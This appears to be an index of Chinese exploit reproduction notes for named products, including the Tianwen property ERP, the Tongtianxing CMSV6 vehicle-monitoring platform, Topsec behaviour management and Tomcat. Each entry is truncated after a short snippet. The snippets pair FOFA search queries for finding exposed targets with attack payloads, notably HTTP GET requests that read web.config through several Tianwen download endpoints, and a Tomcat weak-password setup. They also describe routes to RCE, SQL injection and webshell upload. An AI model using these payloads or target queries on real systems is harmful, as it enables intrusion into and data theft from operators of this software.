T6-1Tosei-自助洗衣机-RCE 漏洞描述: Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。 网站图片: 网络测绘: fofa语法: FOFA:body=“t
T5-3Tomcat–InformationLeakage 漏洞复现: payload: POST / HTTP/1.1 Host: hostname Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" Sec-Ch-Ua-Mobile: ?0 S
T5-1Tomcat-RCE 漏洞描述: tomcat启用manager(后台管理)功能,且存在弱口令 漏洞复现: 在 conf/tomcat-users.xml 文件中配置用户的权限和一个弱口令 tomcat/tomcat: payload: <tomcat-users> <role role
T4-1TraggoServer-任意文件读取 漏洞描述: Traggo Server是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。可以用来跟踪、分析每天时间用在哪些地方,方便更好的管理时间,提高效率。Traggo存在任意文件读取漏洞。 网站图片: 网络测绘: Hun
T3-2天融信-上网行为管理-RCE 漏洞描述: 天融信上网行为管理系统 /view/IPV6/naborTable/static_convert.php接口blocks参数存在任意命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。 网站图片: fofa语法:
T3-1天融信-上网行为管理-RCE 漏洞描述: 天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。 网站图片: 网络测绘: fofa语法: fofa app
T2-8天问-物业ERP系统-任意文件读取 漏洞复现: payload: GET /HM/M_main/InformationManage/ParkingFeelFileDownLoad.aspx?ParkingFile=/web.config HTTP/1.1 Host: User-Agent:
T2-7天问-物业ERP系统-任意文件读取 漏洞复现: payload: GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=/web.config HTTP/1.1 Host: User-
T2-6天问-物业ERP系统-任意文件读取 漏洞复现: payload: GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=/web.config HTTP/1.1 Host: User-Agent:
T2-5天问-物业ERP系统-任意文件读取 漏洞描述: 天问物业ERP系统 AreaAvatarDownLoad.aspx 接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。 网站图片: fofa语法: body=“天问物业
T2-4天问-物业ERP系统-文件上传 漏洞描述: 成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案,实现物管公司的管理升级;以平台搭建和资源整合为基础,建立社区O2O服务平台,向物管公司提供旨在完
T2-3天问-物业ERP系统-文件上传 漏洞描述: 成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统AjaxUpload.aspx存在文件上传漏洞,攻击者可以利用漏洞上传恶意文件
T2-2天问-物业ERP系统-文件上传 漏洞描述: 成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统UpFile.aspx存在文件上传漏洞,攻击者可以利用漏洞上传恶意文件获取服务
T2-1天问-物业ERP系统-任意文件读取 漏洞描述: 影响版本: 天问物业ERP系统 docfileDownLoad.aspx 接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。 网站图片: 网络测绘: fofa语法
T1-10通天星-CMSV6车载定位监控平台-PermissionAC 漏洞复现: payload: POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1 Host: User-Agent
T1-9通天星-CMSV6车载定位监控平台-SQL 漏洞描述: 该漏洞是由于通天星CMSV6车载定位监控平台 /edu_security_officer/disable接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝
T1-8通天星-CMSV6车载定位监控平台-SQL 漏洞描述: 2024年5月,通天星CMSV6发布新版本修复了一处SQL注入漏洞。漏洞是由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行
T1-7通天星-CMSV6车载定位监控平台-任意文件读取 漏洞描述: 通天星CMSV6车载视频监控平台 downloadLogger.action接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。 网站图片: 网络测绘: fofa语法: FO
T1-6通天星-CMSV6车载定位监控平台-文件上传 漏洞描述: 通天星CMSV6 车载定位监控平台upload接口处存在文件上传漏洞,攻击者可通过该漏洞直接上传一个 webshell 到服务器上,获取服务器权限,进⽽控制整个 web 服务器。 影响版本: version < 7.33.0.2_20
T1-5通天星-CMSV6车载定位监控平台-SQL 漏洞描述: 通天星CMSV6车载视频监控平台 StandardApiAction_vehicleTTS.action接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。 网站图片: 网络测绘: